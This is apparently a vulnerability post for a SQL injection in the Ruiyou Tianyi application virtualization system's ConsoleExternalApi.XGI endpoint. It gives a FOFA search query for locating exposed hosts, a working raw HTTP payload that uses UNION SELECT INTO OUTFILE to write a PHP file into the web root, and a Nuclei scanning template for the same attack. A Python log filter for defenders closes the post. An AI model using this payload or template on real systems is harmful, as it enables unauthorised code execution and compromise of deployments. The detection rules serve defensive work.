Babing
Published on 2024-08-30

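R1-6 Ruiyou Tianyi Application Virtualization System - SQL

Vulnerability description:

The Ruiyou Tianyi (瑞友天翼) application virtualization system has a SQL injection vulnerability in its ConsoleExternalApi.XGI endpoint (consoleexternalapi).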

Network mapping:

FOFA query:

title="瑞友天翼-应用虚拟化系统"

Vulnerability reproduction:

Payload:

POST /ConsoleExternalApi.XGI?initParams=command_createUser__pwd_1&key=inner&sign=9252fae35ff226ec26c4d1d9566ebbde HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: close
Content-Length: 588
Content-Type: application/json
Cookie: PHPSESSID=t50ep2hj6cj7cvoitlrp7noop7; CookieLanguageName=ZH-CN; think_language=zh-CN; UserAuthtype=0
User-Agent: Mozilla/5.0

{
"account": "1' union select '<?php echo(md5(\"dBa9d\"));unlink(__FILE__);?>',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL into outfile '..\\\\..\\\\WebRoot\\\\{{filename}}.xgi'#",
"userPwd": "1"
}

GET /{{filename}}.xgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0

YAML template

id: ruiyoutianyi-xunihua-consoleexternalapi-sqli

info:
  name: ruiyoutianyi-xunihua-consoleexternalapi-sqli
  author: unknow
  severity: high
  description: 瑞友天翼 虚拟化系统 consoleexternalapi存在sql注入漏洞。
  tags:  ruiyoutianyi,sqli
  metadata:
    fofa-query: title="瑞友天翼-应用虚拟化系统"

variables:
  filename: '{{rand_base(7)}}'

http:
  - raw:
      - |              
        POST /ConsoleExternalApi.XGI?initParams=command_createUser__pwd_1&key=inner&sign=9252fae35ff226ec26c4d1d9566ebbde HTTP/1.1
        Host: 
        Accept-Encoding: gzip
        Connection: close
        Content-Length: 588
        Content-Type: application/json
        Cookie: PHPSESSID=t50ep2hj6cj7cvoitlrp7noop7; CookieLanguageName=ZH-CN; think_language=zh-CN; UserAuthtype=0
        User-Agent: Mozilla/5.0

        {
        "account": "1' union select '<?php echo(md5(\"dBa9d\"));unlink(__FILE__);?>',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL into outfile '..\\\\..\\\\WebRoot\\\\{{filename}}.xgi'#",
        "userPwd": "1"
        }
      - |              
        GET /{{filename}}.xgi HTTP/1.1
        Host: 
        User-Agent: Mozilla/5.0     

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && contains(body_2, "24ac7a1d67b5ee9e7334d3d5e146b41c") && contains(header_2, "text/html")'
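
For defenders, the request shape above can be turned into a log or proxy filter. The following is an added example, not part of the original post or of the vendor's code: it flags POSTs to ConsoleExternalApi.XGI whose JSON string values contain a UNION SELECT, an INTO OUTFILE/DUMPFILE clause, a PHP open tag, or a script file name as the write target. The function name, rule names and sample requests are assumptions constructed for illustration.

```python
import json
import re
from urllib.parse import urlsplit

# Rules derived from the request shape shown on this page (assumed names).
RULES = {
    "union-select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    "file-write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "php-tag": re.compile(r"<\?(?:php|=)", re.I),
    "script-target": re.compile(r"\.(?:xgi|php)\b['\"]?\s*(?:#|--|$)", re.I),
}
ENDPOINT = "/consoleexternalapi.xgi"


def _strings(node):
    """Yield every string value found in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from _strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from _strings(value)


def inspect_request(method, target, body):
    """Return the sorted names of the rules that fire for one logged request."""
    if method.upper() != "POST" or urlsplit(target).path.lower() != ENDPOINT:
        return []
    try:
        values = list(_strings(json.loads(body)))
    except ValueError:
        values = [body]  # malformed JSON: scan the raw body instead
    return sorted({n for v in values for n, rx in RULES.items() if rx.search(v)})


# Constructed sample requests (not captured traffic).
TARGET = "/ConsoleExternalApi.XGI?initParams=x&key=inner&sign=0"
BENIGN = ("POST", TARGET, json.dumps({"account": "alice", "userPwd": "s3cret"}))
SUSPECT = ("POST", TARGET, json.dumps({
    "account": "1' union select '<?php /*constructed*/ ?>',NULL "
               "into outfile '..\\\\WebRoot\\\\demo.xgi'#",
    "userPwd": "1"}))

if __name__ == "__main__":
    for request in (BENIGN, SUSPECT):
        print(request[1].split("?")[0], inspect_request(*request))
```

Because the second request in the template fetches a newly written .xgi file from WebRoot, pairing this filter with file-creation monitoring on that directory covers both stages.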
